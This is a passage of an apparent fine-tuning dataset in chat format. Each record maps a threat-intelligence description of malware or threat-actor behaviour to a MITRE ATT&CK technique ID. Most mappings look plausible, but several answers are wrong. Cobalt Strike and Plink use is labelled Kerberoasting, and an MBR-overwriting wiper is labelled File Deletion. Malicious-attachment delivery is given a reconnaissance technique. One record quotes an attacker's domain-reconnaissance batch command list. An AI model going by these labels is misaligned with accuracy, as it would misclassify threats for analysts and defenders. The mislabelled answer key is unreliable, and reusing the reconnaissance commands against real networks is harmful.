- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LockerGoga has encrypted files, including core Windows OS files, using RSA-OAEP MGF1 and then demanded Bitcoin be paid for the decryption key."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data. In Windows, Chrome cookies and saved passwords are encrypted using DPAPI"
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper's backdoor could list the infected system's installed software."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Actors used the del.exe command with the /f parameter to force the deletion of read-only files with the *.rar and tempg* wildcards."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon enables the service RemoteRegistry, which allows a program to remotely modify the registry. It also disables remote user account control by enabling the registry key LocalAccountTokenFilterPolicy"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DRATzarus can enumerate and examine running processes to determine if a debugger is present."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has executed Windows commands by using `cmd` and running batch scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute commands on victims."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrailBlazer has used random identifier strings to obscure its C2 operations and result codes."
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Chinoxy dropping function can initiate decryption of its config file."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN4 has created rules in victims' Microsoft Outlook accounts to automatically delete emails containing words such as “hacked,\" \"phish,\" and “malware\" in a likely attempt to prevent organizations from communicating about their activities."
- },
- {
- "role": "assistant",
- "content": "T1564.008 - Hide Artifacts: Email Hiding Rules"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can exploit vulnerabilities such as MS14-058."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turian can use WinRAR to create a password-protected archive for files of interest."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary also used the commodity Cobalt Strike framework and Plink tunneling tool in many of these campaigns"
- },
- {
- "role": "assistant",
- "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Revenge RAT uses cmd.exe to execute commands and run scripts on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver can encode binary data into a .PNG file for C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLATINUM has transferred files using the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Microsoft’s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims’ machines."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The data dump included the 0000000000.bat file, which when executed on an infected system would run the following commands to gather information to be sent back to the C2 server: whoami hostname ipconfig /all net user /domain net group /domain net group “domain admins” /domain net group “Exchange Trusted Subsystem” /domain net accounts /domain net user net localgroup administrators netstat -an tasklist systeminfo reg query “HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default” schtasks /query /FO List /TN “GoogleUpdatesTaskMachineUI” /V | findstr /b /n /c:”Repeat: Every:” WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List This batch script is also interesting as it uses echo commands to include headers before each of the command results"
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery', 'T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "admin@338 actors used the following commands after exploiting a machine with LOWBALL malware to obtain information about the OS: \"ver >> %temp%\\download\" \"systeminfo >> %temp%\\download\""
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor compresses communications using the standard Zlib compression library."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QUADAGENT gathers the victim username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MailSniper can be used for searching through email in Exchange and Office 365 environments."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR)."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Poseidon Group searches for administrator accounts on both the local victim machine and the network."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1546.008 - Event Triggered Execution: Accessibility Features"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Based on posts on an underground forum, we believe that the developer of Chthonic supplies binaries to other cyber-criminals and rents out the C2 infrastructure. Therefore, this distribution of victims likely represents several otherwise unconnected cyber-crime operations."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware', 'T1583 - Acquire Infrastructure"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has searched for SSH keys, Docker credentials, and Kubernetes service tokens."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may be used to exfiltrate data separate from the main command and control protocol."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole avoids analysis by encrypting all strings, internal files, configuration data and by using a custom executable format."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LiteDuke can enumerate the account name on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UBoatRAT takes advantage of the /SetNotifyCmdLine option in BITSAdmin to ensure it stays running on a system to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon initial execution, the Windows Registry is checked to determine if DarkWatchman has already been installed. The malware stores its configuration in ‘\\\\HKCU\\Software\\Microsoft\\Windows\\DWM\\‘, using registry keys that consist of a uid generated from the serial number of the C: drive and appended with a single digit or character. Installation is denoted by uid + 0 (eg: abc1230) – if the malware does not find a ‘1‘ flag in this key, it runs its install function"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PingPull can collect data from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KEYMARBLE uses a customized XOR algorithm to encrypt C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIVEHANDS can receive a CLI argument for a path, this limits the ransomware's file encryption activities to the specified directory. DEATHRANSOM and HELLOKITTY do not accept CLI arguments"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used webshells including P.A.S. Webshell to maintain access to victim networks."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT has relied on a victim to open a malicious attachment within an email for execution."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has conducted credential theft operations to obtain credentials to be used for access to victim environments."
- },
- {
- "role": "assistant",
- "content": "T1589.001 - Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth has been delivered via malicious e-mail attachments."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has the ability to retrieve a list of services on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command ID 17 indexes to a function that collects the system information and sends it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rifdoor has the ability to identify the Windows version on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In rare cases, LockBit 2.0 has been observed to create accounts for persistence with simple names, such as “a.”"
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SYSCON has the ability to execute commands through cmd on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "use HTTPS for all command and control communication methods."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AutoIt backdoor downloads a PowerShell script that decodes to a typical shellcode loader."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has collected information via Empire, which is automatically sent the data back to the adversary's C2."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linfo creates a backdoor through which remote attackers can delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to list all servers in the domain, as well as one to locate domain controllers on a domain."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Olympic Destroyer attempts to copy itself to remote machines on the network."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HD Creates a file in the Temp path and names it “hd” + PCID then invokes another program module named hd.test1 to identify logical drives"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Seasalt has masqueraded as a service called \"SaSaut\" with a display name of \"System Authorization Service\" in an apparent attempt to masquerade as a legitimate service."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used HTTP for C2 and data exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "launched a scheduled task to gain persistence using the schtasks /create /sc command."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LockBit 2.0 enumerates system information such as hostname, shares, and domain information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BabyShark has used scheduled tasks to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ccf32 can parse collected files to identify specific file extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains many methods for bypassing Windows User Account Control on multiple versions of the operating system."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GOLD SOUTHFIELD has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR."
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For example, ORat uses a WMI event consumer to maintain its presence on a compromised host. The group also creates and maintains scheduled tasks to achieve this purpose"
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has been installed via MSI installer."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers gain an initial foothold on targeted machines via phishing emails containing malicious attachments. The emails are often industry-specific and crafted to entice a victim to open the message and execute the attached document"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "There doesn’t appear to be anything unique when it comes to the Word Document and its standard ploy of pushing recipients to “enable content” and run a malicious macro. An analysis of the link from the phishing e-mail contains a base64-encoded string representing the recipient’s address. Using that string, attackers insert the recipient’s name into the filename of the World document"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rundll32.exe is used as a way of executing at the command-line."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 used SDelete to remove artifacts from victims."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tarrask has masqueraded as executable files such as `winupdate.exe`, `date.exe`, or `win.exe`."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti Group looked for a specific process running on infected servers."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This function is the supporting functionality for WinVNC. To allow the VNC session to connect, the current network socket WSAProtcol_Info structure is written to a named pipe prior to calling zxFunction001"
- },
- {
- "role": "assistant",
- "content": "T1021.005 - Remote Services:VNC"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has injected malicious macros into all Word and Excel documents on mapped network drives."
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
